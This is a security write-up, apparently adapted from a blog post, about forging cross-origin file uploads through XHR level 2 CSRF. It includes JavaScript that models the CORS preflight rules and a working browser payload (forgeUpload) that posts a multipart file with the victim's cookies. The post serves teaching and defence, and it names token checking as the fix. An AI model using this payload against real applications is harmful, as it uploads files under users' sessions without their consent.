XMLHttpRequest level 2, as implemented in HTML5 browsers, can open a connection to another origin and deliver an HTTP request to it. Such cross-origin calls are governed by CORS: for most requests the browser first sends a preflight (OPTIONS) request and consults the target's policy before the real request goes out. The important exception is that a POST whose body is multipart/form-data counts as a "simple" request and is sent without any preflight, and setting "withCredentials" makes the browser attach the victim's cookies to it. The target server processes the upload regardless of whether it later allows the attacker's page to read the response, since the Access-Control-Allow-* headers only gate response visibility. This can be exploited to upload business-logic files via CSRF when the server does not validate an anti-CSRF token or CAPTCHA on the upload endpoint. Business applications routinely accept uploads of files such as orders, invoices, imports and contacts, and these critical functions are exposed when they are poorly programmed.
For an application with a genuine upload form, an HTTP request of the following shape is generated at the time of upload. Note that the session cookie is sent along and the body is a multipart form.
Now suppose the CSRF payload on the attacker's page makes the following XHR call.
That call generates the HTTP request shown next, which completes the CSRF and uploads the file. So, without the user's consent or knowledge, a file from another domain is uploaded to the target application under the logged-in user's credentials.
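To make the mechanism concrete, here is an added example (my own code, not from the original post or the captured requests it refers to). It implements the CORS "simple request" rule that decides whether a preflight is sent, reproduces the multipart/form-data body that FormData builds for a one-file upload, renders the forged request as the target server sees it, and finally shows the browser-side payload itself. The target host, path, cookie value, attacker origin, field name and file name are all hypothetical.

```javascript
// Added example, not code from the original post. Shows (1) the CORS rule that
// lets a multipart/form-data POST cross origins without a preflight, (2) the
// body FormData produces for a one-file upload, (3) the request the target sees,
// and (4) the browser payload. Host, path, cookie, field and file names are
// hypothetical values constructed for illustration.

// CORS-safelisted request rules (WHATWG Fetch): method GET/HEAD/POST, only
// safelisted request headers, and a Content-Type limited to three essences.
const SAFE_METHODS = new Set(["GET", "HEAD", "POST"]);
const SAFE_HEADERS = new Set(["accept", "accept-language", "content-language", "content-type"]);
const SAFE_CONTENT_TYPES = new Set([
  "application/x-www-form-urlencoded",
  "multipart/form-data",
  "text/plain",
]);

// True when the browser must send an OPTIONS preflight first. withCredentials
// plays no part here: cookies ride along on any safelisted request, and the
// Access-Control-Allow-* response headers only decide whether the attacker's
// page may read the reply, not whether the server processed the upload.
function needsPreflight(method, headers) {
  if (!SAFE_METHODS.has(method.toUpperCase())) return true;
  for (const [name, value] of Object.entries(headers)) {
    const lname = name.toLowerCase();
    if (!SAFE_HEADERS.has(lname)) return true;
    if (lname === "content-type") {
      const essence = value.split(";")[0].trim().toLowerCase();
      if (!SAFE_CONTENT_TYPES.has(essence)) return true;
    }
  }
  return false;
}

// Body that FormData.append(fieldName, blob, fileName) serialises to: one part
// carrying the file, terminated by the closing boundary.
function buildMultipartBody(fieldName, fileName, content, boundary) {
  return [
    `--${boundary}`,
    `Content-Disposition: form-data; name="${fieldName}"; filename="${fileName}"`,
    "Content-Type: text/csv",
    "",
    content,
    `--${boundary}--`,
    "",
  ].join("\r\n");
}

// Renders what the target sees on the wire: the victim's cookie is replayed and
// Origin names the attacker's page. Origin is the one header a server can still
// check when no anti-CSRF token is present in the form.
function renderForgedRequest(host, path, attackerOrigin, cookie, boundary, body) {
  return [
    `POST ${path} HTTP/1.1`,
    `Host: ${host}`,
    `Origin: ${attackerOrigin}`,
    `Cookie: ${cookie}`,
    `Content-Type: multipart/form-data; boundary=${boundary}`,
    `Content-Length: ${new TextEncoder().encode(body).length}`,
    "",
    body,
  ].join("\r\n");
}

// Browser-side CSRF payload (runs only on the attacker's page, needs the DOM
// FormData/Blob/XMLHttpRequest globals). The browser classifies it as a
// safelisted request, so no preflight is sent and the victim's cookies go out.
function forgeUpload(targetUrl, fieldName, fileName, content) {
  const form = new FormData();
  form.append(fieldName, new Blob([content], { type: "text/csv" }), fileName);
  const xhr = new XMLHttpRequest();
  xhr.open("POST", targetUrl, true);
  xhr.withCredentials = true; // attach the victim's cookies for targetUrl
  xhr.send(form);             // multipart/form-data: sent without preflight
  return xhr;
}
```

The first three functions run anywhere (Node or browser); forgeUpload needs a browser. The point to take from needsPreflight is that adding a single custom header such as X-Requested-With, or switching the body to application/json, is enough to trigger a preflight, which is why the multipart upload endpoint is the weak spot: its only effective defence is a per-session token that the server actually checks, since the cookie alone proves nothing about who built the request.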
Future probes: one should also check other impacts, such as AMF stream uploads, XML file transfers and the other library protocols that now use multipart bodies to carry binary calls.
Readers interested in this analysis should also see @kkotowicz's work: http://blog.kotowicz.net/2011/04/how-to-upload-arbitrary-file-contents.html.